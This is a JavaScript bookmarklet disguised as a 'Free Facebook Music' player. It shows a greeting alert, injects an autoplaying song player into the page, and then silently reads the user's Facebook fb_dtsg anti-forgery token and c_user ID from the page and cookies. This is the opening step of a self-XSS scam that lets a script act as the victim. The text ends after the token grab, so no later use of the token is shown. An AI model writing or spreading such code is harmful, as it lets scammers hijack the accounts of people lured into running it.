javascript:
var parent=document.getElementsByTagName("html")[0];
alert("Free Facebook Music .. any request ? pm me \n BRENT HERE ^_^");
var _body = document.getElementsByTagName('body')[0];
var _div = document.createElement('div');
_div.style.height="25";
_div.style.width="100%";
_div.style.position="fixed";
_div.style.top="auto";
_div.style.bottom="0";
_div.align="center";
var _audio= document.createElement('audio');
_audio.style.width="100%";
_audio.style.height="25px";
_audio.controls = true;
_audio.autoplay = false;
_audio.autoplay = true;
_audio.loop = true;
_audio.src = "http://srv25.vidtomp3.com/download/4pibbmtnmmVmr6yq3JWYtGpjoWpoa2xrmprfjqKU3KGho2w=/Bastille%20-%20Pompeii%20if%20you%20close%20your%20eyes%20lyrics.mp3";
_div.appendChild(_audio);
_body.appendChild(_div);
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
